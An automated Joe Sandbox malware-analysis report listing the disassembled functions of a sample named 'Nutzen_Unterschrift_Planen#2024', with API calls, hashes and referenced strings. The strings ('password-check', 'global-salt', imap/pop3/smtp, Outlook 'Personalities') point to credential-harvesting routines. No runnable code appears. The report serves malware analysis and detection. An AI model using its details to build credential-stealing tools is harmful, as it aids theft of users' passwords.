                                                            • API String ID: 2923679083-4161923789
                                                            • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                            • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                            APIs
                                                            • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                            Strings
                                                            • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                            • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                            • no such savepoint: %s, xrefs: 00426A02
                                                            • abort due to ROLLBACK, xrefs: 00428781
                                                            • unknown error, xrefs: 004277B2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                            • API String ID: 3510742995-3035234601
                                                            • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                            • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                            • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                            • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                            • API String ID: 2221118986-3608744896
                                                            • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                            • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                            • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                            • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                            APIs
                                                            • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                              • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmpmemcpy
                                                            • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                            • API String ID: 1784268899-4153596280
                                                            • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                            • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                            • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                            • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                            • memset.MSVCRT ref: 00410246
                                                            • memset.MSVCRT ref: 00410258
                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                            • memset.MSVCRT ref: 0041033F
                                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                            • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                            • String ID:
                                                            • API String ID: 3974772901-0
                                                            • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                            • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                            APIs
                                                            • wcslen.MSVCRT ref: 0044406C
                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                            • strlen.MSVCRT ref: 004440D1
                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                            • String ID:
                                                            • API String ID: 577244452-0
                                                            • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                            • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                            APIs
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            • _strcmpi.MSVCRT ref: 00404518
                                                            • _strcmpi.MSVCRT ref: 00404536
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi$memcpystrlen
                                                            • String ID: imap$pop3$smtp
                                                            • API String ID: 2025310588-821077329
                                                            • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                            • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                            • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                            • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C02D
                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                            • API String ID: 2726666094-3614832568
                                                            • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                            • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                            APIs
                                                            • memset.MSVCRT ref: 00403A88
                                                            • memset.MSVCRT ref: 00403AA1
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                            • strlen.MSVCRT ref: 00403AE9
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                            • String ID:
                                                            • API String ID: 1786725549-0
                                                            • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                            • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                            • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                            • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                            • String ID:
                                                            • API String ID: 2014771361-0
                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                            APIs
                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID: global-salt$password-check
                                                            • API String ID: 231171946-3927197501
                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                            • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                            • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                            • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004016A3
                                                            • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                            • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                            • BeginPaint.USER32(?,?), ref: 004016D7
                                                            • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                            • EndPaint.USER32(?,?), ref: 004016F3
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                            • String ID:
                                                            • API String ID: 19018683-0
                                                            • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                            • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                            • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                            • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                            APIs
                                                            • memset.MSVCRT ref: 0040644F
                                                            • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                            • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                              • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                            • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                            APIs
                                                            • memset.MSVCRT ref: 0044495F
                                                            • memset.MSVCRT ref: 00444978
                                                            • memset.MSVCRT ref: 0044498C
                                                              • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                            • strlen.MSVCRT ref: 004449A8
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                            • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                              • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                            • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset$strlen
                                                            • String ID:
                                                            • API String ID: 2142929671-0
                                                            • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                            • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                            • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                            • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                            APIs
                                                            • _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                            • strlen.MSVCRT ref: 00408E4F
                                                            • LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                            • memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D5C
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D7A
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408D98
                                                              • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408DA8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                            • String ID: strings
                                                            • API String ID: 4036804644-3030018805
                                                            APIs
                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                            • memset.MSVCRT ref: 0040330B
                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                            • strchr.MSVCRT ref: 0040335A
                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                            • strlen.MSVCRT ref: 0040339C
                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                            • String ID: Personalities
                                                            • API String ID: 2103853322-4287407858
                                                            APIs
                                                            • memset.MSVCRT ref: 00444573
